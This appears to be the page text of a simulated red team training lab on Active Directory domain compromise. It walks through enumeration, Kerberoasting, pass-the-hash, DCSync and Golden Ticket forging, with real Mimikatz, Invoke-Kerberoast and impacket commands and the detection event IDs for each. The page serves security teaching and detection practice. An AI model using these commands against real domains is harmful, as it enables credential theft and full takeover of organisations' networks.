█████╗ ██████╗ █████╗ ████████╗████████╗ █████╗ ██████╗██╗ ██╗███████╗ ██╔══██╗██╔══██╗ ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝ ███████║██║ ██║ ███████║ ██║ ██║ ███████║██║ █████╔╝ ███████╗ ██╔══██║██║ ██║ ██╔══██║ ██║ ██║ ██╔══██║██║ ██╔═██╗ ╚════██║ ██║ ██║██████╔╝ ██║ ██║ ██║ ██║ ██║ ██║╚██████╗██║ ██╗███████║
ACTIVE DIRECTORY ATTACKS
DOMAIN COMPROMISE — RED TEAM LAB
MODULE 08 — ENUM · KERBEROAST · PTH · DCSYNC · GOLDEN TICKET
Connecting to APEXCORP.LOCAL domain...

OBJECTIVES

Enumerate domain users and groups
Identify the attack path to Domain Admin
Kerberoast — extract a service ticket
Crack the Kerberos ticket hash
Pass-the-Hash — authenticate as svc-sql
DCSync — dump domain hashes
Forge a Golden Ticket
Read the domain flag
💻
PowerShell
🕸️
Attack Path
🔑
Hash / Ticket Viewer
🛡️
Detection Log
📖
Reference
📝
Notepad
🏴
Submit Flag
AD ATTACKS
PowerShell
Attack Path
Hashes
Detection Log
Reference
Notepad
Submit Flag
--:--:--
PHASE 1 — ENUMERATION
MISSION BRIEF
PENTEST ENGAGEMENT — AUTHORISED
🔗 Peer lab — Network Security & IR path:
Active Directory Defence & Detection

ACTIVE DIRECTORY ATTACKS

DOMAIN: APEXCORP.LOCAL · DC: 10.10.18.10

SITUATION

You have compromised workstation WKSTN-014 and have credentials for low-privilege domain user j.porter (password: iloveyou). The goal is to escalate from this foothold to Domain Admin on the APEXCORP.LOCAL domain.

ENVIRONMENT

ObjectValue
DomainAPEXCORP.LOCAL
DCDC01 — 10.10.18.10
Current userj.porter (Domain Users)
WorkstationWKSTN-014
Known credsj.porter : iloveyou

ATTACK CHAIN

  • Phase 1 — Enumerate domain objects
  • Phase 2 — Find attack path via Attack Path viewer
  • Phase 3 — Kerberoast the svc-sql account
  • Phase 4 — Crack ticket → get plaintext password
  • Phase 5 — Pass-the-Hash to authenticate as svc-sql
  • Phase 6 — DCSync to dump all domain hashes
  • Phase 7 — Forge Golden Ticket with krbtgt hash
  • Phase 8 — Access DC and read flag

DETECTION NOTE

Each technique you use generates Windows Event Log entries visible in the Detection Log panel. This is what a SOC analyst would see. Check it after each phase — the peer lab covers defence of these exact events.

Display Mode
POWERSHELL — j.porter@WKSTN-014
Windows PowerShell 7.4.1 — j.porter@APEXCORP.LOCAL
PS C:\Users\j.porter> # Type "help" for AD attack commands
PS C:\Users\j.porter>
ATTACK PATH — APEXCORP.LOCAL
User
Group
Computer
Domain Admin
Owned
Click nodes for details · Red = attack path
HASH & TICKET VIEWER
Kerberos Tickets
NTLM Hashes
Golden Ticket
Run Kerberoasting to capture service tickets
DETECTION LOG — Windows Security Events
Monitoring active
0 events
No suspicious events yet — begin your attack to generate detectable activity
REFERENCE — AD ATTACKS
ENUMERATION
net user /domain net group "Domain Admins" /domain Get-ADUser -Filter * -Properties * Get-ADGroupMember "Domain Admins" setspn -T APEXCORP -Q */*
KERBEROASTING
Request Kerberos service tickets for accounts with SPNs. Tickets are encrypted with the service account's hash — crack offline.
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} Invoke-Kerberoast -OutputFormat Hashcat | Out-File kerb.txt
Detection: Event ID 4769 — Kerberos Service Ticket requested with RC4 encryption (0x17)
PASS-THE-HASH
Use an NTLM hash to authenticate without the plaintext password. Works against NTLM-based services.
Invoke-TheHash -Type WMIExec -Target DC01 -Username svc-sql -Hash [NTLM] impacket-psexec -hashes :[NTLM] svc-sql@10.10.18.10
Detection: Event ID 4624 — Logon Type 3, NtLmSsp authentication package (no Kerberos)
DCSYNC
Mimics a Domain Controller replication request to extract password hashes for any domain account including krbtgt.
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:APEXCORP.LOCAL /user:krbtgt"' impacket-secretsdump -just-dc APEXCORP/svc-sql@10.10.18.10
Detection: Event ID 4662 — DS-Replication-Get-Changes-All right accessed on directory object
GOLDEN TICKET
Forge a Kerberos TGT using the krbtgt account hash. Grants access as any user to any service. Valid until krbtgt password is changed twice.
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:APEXCORP.LOCAL /sid:[SID] /krbtgt:[HASH] /ticket:golden.kirbi"' kerberos::ptt golden.kirbi
Detection: Event ID 4769 — ticket with anomalous lifetime or RC4 encryption for sensitive accounts. Microsoft ATA/Defender for Identity flags PAC anomalies and domain SID mismatches.
DOMAIN SID
Get-ADDomain | Select-Object DomainSID whoami /user
NOTEPAD
SUBMIT DOMAIN FLAG
DOMAIN FLAG

After forging a Golden Ticket, access \\DC01\C$\flag.txt to retrieve the flag.